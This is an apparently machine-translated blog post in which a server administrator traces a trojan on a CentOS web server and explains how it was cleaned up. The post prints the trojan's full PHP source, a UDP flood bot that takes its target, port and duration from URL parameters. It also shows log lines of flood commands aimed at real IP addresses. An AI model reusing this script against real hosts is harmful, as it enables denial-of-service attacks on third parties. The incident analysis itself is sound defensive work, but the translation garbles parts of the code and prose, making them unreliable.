A Trojan horse capture experience on the Centos Server

At this morning, I received a warning message from cloudmonitor saying that the website M was inaccessible. Sleep is sweet. Besides, the website's system is centos. Important data is backed up every day. It should be very safe and I don't care. Go back to bed.
At in the morning, the IDC Administrator calls me directly, saying that the network in the entire IDC is very slow, and all the websites in the organization cannot be opened or opened very slowly. A Trojan horse capture experience on the Centos Server
I hurried over and checked the network and found that 175 services always send packets at a speed of 50 Mb/s, and 175 servers are the server where M is located.
Decisively SSH connects to the 175 server, and finds that the connection to the 175 server is also slow. After the connection, top up and view the cpu load:
Top
 
Two apache processes occupy more than 40% of the cpu and immediately stop the httpd service.
Service httpd stop
 
After the httpd service is stopped, check the network status again. The 175 server does not send packets out, and everything is normal.
It is determined that 175 of servers are infected with Trojans, and packets are sent out, occupying the bandwidth of all data centers.
The next step is to capture the horse!
175 the server has a hardware firewall and only ports http80 and ssh22 are enabled. ssh is unlikely to be compromised. It should be infected by web vulnerabilities. The trojan file should be within one day.
Switch to the root directory of the M site, find the files changed in the last day, and execute
Find./-mtime-1
 
Sure enough, a suspicious file named phzLtoxn. php appears in the directory list. Check the trojan program creator and execute
Ls-l phzLtoxn. php
The file is missing. Will the file be self-destroyed? A Trojan horse capture experience on the Centos Server
In an episode, the Administrator next door, Xiao Huang, also noticed the file and deleted it without saying anything. I used to criticize and educate Xiao Huang. When you see the trojan program, you will know how to delete, and delete it! Won't a trojan be generated again? You have to make it easy. You must find the vulnerability source! There is no way to delete it, and then the httpd service is enabled, leading the way into the room, and so on to see if it can be generated again.
Sure enough, the new phzLtoxn. php file was generated in less than half an hour. After checking that the file creator is apache, it is determined that the file was uploaded through a website vulnerability.
Analyze the trojan file and check the hacker's intention.
The source code of the phzLtoxn. php file is pasted here, and simple annotations are made for learning purposes only.
<? Php
// Set the script running time
Set_time_limit (999999 );
// Attack target server ip Address
$ Host = $ _ GET ['host'];
// Attack the target server port
$ Port = $ _ GET ['Port'];
// Attack duration
$ Exec_time = $ _ GET ['time'];
// Number of bytes sent each time
$ Sendlen = 65535;
$ Packets = 0;
// Set the client to disconnect without terminating Script Execution
Ignore_user_abort (TRUE );
// Step1. the target server $ host, port $ port, and running duration $ exec_time are valid.
If (StrLen ($ host) = 0 or StrLen ($ port) = 0 or StrLen ($ exec_time) = 0 ){
If (StrLen ($ _ GET ['rat ']) <> 0 ){
Echo $ _ GET ['rat ']. $ _ SERVER ["HTTP_HOST"]. "| ". getHostByName ($ _ SERVER ['server _ name']). "| ". php_uname (). "| ". $ _ SERVER ['server _ soft']. $ _ GET ['rat '];
Exit;
}
Echo "Warning to: opening ";
Exit;
}
// Step2. set the sending string $ out. Here is "AAAAAAAAAA ..."
For ($ I = 0; $ I <$ Sendlen; $ I ++ ){
$ Out. = "";
}
$ Max_time = time () + $ exec_time;
// Step: Use udp to send a string to the target server
While (1 ){
$ Packets ++;
If (time ()> $ max_time ){
Break;
}
$ Fp = fsockopen ("udp: // $ host", $ port, $ errno, $ errstr, 5 );
If ($ fp ){
Fwrite ($ fp, $ out );
Fclose ($ fp );
}
}
// Step 4. Attack statistics
Echo "Send Host $ host: $ port <br> ";
Echo "Send Flow $ packets * ($ Sendlen/1024 = ". round ($ Sendlen/1024, 2 ). ") kb/1024 = ". round ($ packets * $ Sendlen/1024/1024, 2 ). "mb <br> ";
Echo "Send Rate ". round ($ packets/$ exec_time, 2 ). "packs/s ". round ($ packets/$ exec_time * $ Sendlen/1024/1024, 2 ). "mb/s ";
?>
 
The above Code shows that it is a typical ddos attack code. Hackers should use our servers as a zombie and organize a large number of zombie servers to send packets to the target server. Hackers only need to open the browser, knock into the http://www.bkjia.com // phzLtoxn. php? Host = x. x & port = xx & time = xx to launch ddos attacks on the target server.
View httpd logs, analyze the attack ip source, and execute
[Plain] view plaincopy
Tail/var/log/httpd/access. log | grep phzLtonxn. php
183.12.75.240--[10/Aug/2012: 10: 38: 46 + 0800] "GET/phzLtoxn. php? Host = 174.139.81.91 & port = 80 & time = 60 HTTP/1.1 "404 290"-"" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2 ;. net clr 2.0.50727 ;. net clr 3.5.30729 ;. net clr 3.0.30729; Media Center PC 6.0 ;. NET4.0C ;. NET4.0E )"
110.185.121.167--[10/Aug/2012: 10: 38: 56 + 0800] "GET/phzLtoxn. php? Host = 218.93.248.98 & port = 80 & time = 60 HTTP/1.1 "404 290"-"" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2 ;. net clr 2.0.50727 ;. net clr 3.5.30729 ;. net clr 3.0.30729; Media Center PC 6.0 ;. NET4.0C ;. NET4.0E )"
110.185.121.167--[10/Aug/2012: 10: 38: 58 + 0800] "GET/phzLtoxn. php? Host = 198.148.89.34 & port = 80 & time = 60 HTTP/1.1 "404 290"-"" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2 ;. net clr 2.0.50727 ;. net clr 3.5.30729 ;. net clr 3.0.30729; Media Center PC 6.0 ;. NET4.0C ;. NET4.0E )"
110.185.121.167--[10/Aug/2012: 10: 39: 08 + 0800] "GET/phzLtoxn. php? Host = 199.119.207.20.& port = 80 & time = 60 HTTP/1.1 "404 290"-"" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2 ;. net clr 2.0.50727 ;. net clr 3.5.30729 ;. net clr 3.0.30729; Media Center PC 6.0 ;. NET4.0C ;. NET4.0E )"
110.185.121.167--[10/Aug/2012: 10: 39: 12 + 0800] "GET/phzLtoxn. php? Host = 174.139.81.91 & port = 80 & time = 60 HTTP/1.1 "404 290"-"" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2 ;. net clr 2.0.50727 ;. net clr 3.5.30729 ;. net clr 3.0.30729; Media Center PC 6.0 ;. NET4.0C ;. NET4.0E )"
118.161.219.152--[10/Aug/2012: 10: 39: 27 + 0800] "GET/phzLtoxn. php? Host = 198.148.89.34 & port = 80 & time = 60 HTTP/1.1 "404 290"-"" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2 ;. net clr 2.0.50727 ;. net clr 3.5.30729 ;. net clr 3.0.30729; Media Center PC 6.0 ;. NET4.0C ;. NET4.0E )"
118.161.219.152--[10/Aug/2012: 10: 39: 27 + 0800] "GET/phzLtoxn. php? Host = 174.139.81.91 & port = 80 & time = 60 HTTP/1.1 "404 290"-"" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2 ;. net clr 2.0.50727 ;. net clr 3.5.30729 ;. net clr 3.0.30729; Media Center PC 6.0 ;. NET4.0C ;. NET4.0E )"
118.161.219.152--[10/Aug/2012: 10: 39: 27 + 0800] "GET/phzLtoxn. php? Host = 199.119.207.20.& port = 80 & time = 60 HTTP/1.1 "404 290"-"" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2 ;. net clr 2.0.50727 ;. net clr 3.5.30729 ;. net clr 3.0.30729; Media Center PC 6.0 ;. NET4.0C ;. NET4.0E )"
118.161.219.152--[10/Aug/2012: 10: 39: 27 + 0800] "GET/phzLtoxn. php? Host = 218.93.248.98 & port = 80 & time = 60 HTTP/1.1 "404 290"-"" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2 ;. net clr 2.0.50727 ;. net clr 3.5.30729 ;. net clr 3.0.30729; Media Center PC 6.0 ;. NET4.0C ;. NET4.0E )"
118.161.219.152--[10/Aug/2012: 10: 39: 28 + 0800] "GET/phzLtoxn. php? Host = 61.164.148.49 & port = 80 & time = 60 HTTP/1.1 "404 290"-"" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2 ;. net clr 2.0.50727 ;. net clr 3.5.30729 ;. net clr 3.0.30729; Media Center PC 6.0 ;. NET4.0C ;. NET4.0E )"
 
It is found that the source ip addresses come from multiple sources and the target server ip addresses are also located in many countries. It is a bit strange. Why are there no targeted attacks and boring hackers.
 
Next, find the vulnerability!
1. Review the file permissions under the M-site directory. Only write permissions are enabled for apache for several necessary cached and static directories to prevent the phzLtoxn. php file from being generated again.
2. Restart the httpd service and use 360 website detection to detect the vulnerabilities on site H. Then, the system quickly patches the critical Remote Vulnerability Detected on Site M.
3. After the patch is completed, the system user, database user, ftp user password, and M station system user password are modified by the way.
 
After a few days, everything is normal.
 
Summary of several security principles
1. Minimize permissions.
The web directory must have good permissions and only have the write permission on several necessary folders for apache.
2. always pay attention to patch updates.
Third-party website security detection tools are often used. You can also refer to the top ten security assessment tools. If the website system uses third-party common programs, pay more attention to the information on the wooyun vulnerability platform.
3. Be sure to fix the issue after the move.
Do not simply Delete, delete, or delete data. You need to find the source and analyze the hacker's purpose.
* Author: ye Wentao (focusing on php development, linux O & M, and system architecture)